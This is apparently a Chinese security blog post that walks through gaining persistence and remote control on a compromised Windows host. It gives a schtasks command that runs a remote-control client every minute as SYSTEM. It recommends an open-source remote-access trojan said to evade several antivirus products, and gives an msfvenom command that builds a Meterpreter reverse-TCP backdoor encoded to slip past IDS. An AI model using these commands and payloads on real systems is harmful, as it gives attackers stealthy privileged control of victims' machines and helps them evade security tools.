定时任务

ds.jpg
前提: 已获得目标系统管理员组任何一个成员权限。
命令:

schtasks /create /tn "system" /tr C:\Windows\client.exe /sc MINUTE /mo 1  /ru "System" /RL HIGHEST

命令解释:

/create =>创建任务

/tn "system"    =>指定任务名称为system

/tr C:\Windows\client.exe    =>指定程序路径

/sc MINUTE /mo 1    =>指定类型;MINUTE表示任务每n分钟运行一次,/mo 1表示每1分钟执行一次

/ru "System"    =>指定为system用户运行该任务

/RL HIGHEST    =>运行级别,HIGHEST为使用最高权限运行

远控

这里分享一款国外的开源远控,githubgithub

地址
亲测过包括360,收费版AVG,卡巴斯基在内的大多数杀软。
20-21-27-apt3.jpg
生成client.exe之后放到目标机器以计划任务执行。
20-26-02-apt4.jpg
标上线并且获取了system权限!
20-26-40-apt5.jpg

再来试试msf:

首先生成木马

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.52.130 LPORT=2333 -f exe > /root/Desktop/test.exe

生成后门,用shikata_ga_nai编码绕过IDS检测.
20-28-20-apt7.jpg
在受害机创建定时任务,msf收到回话
20-29-20-apt8.jpg

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/637.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

Kali笔记一键关注
Last modification:March 10, 2019
© Allow specification reprint
正在沿街乞讨中……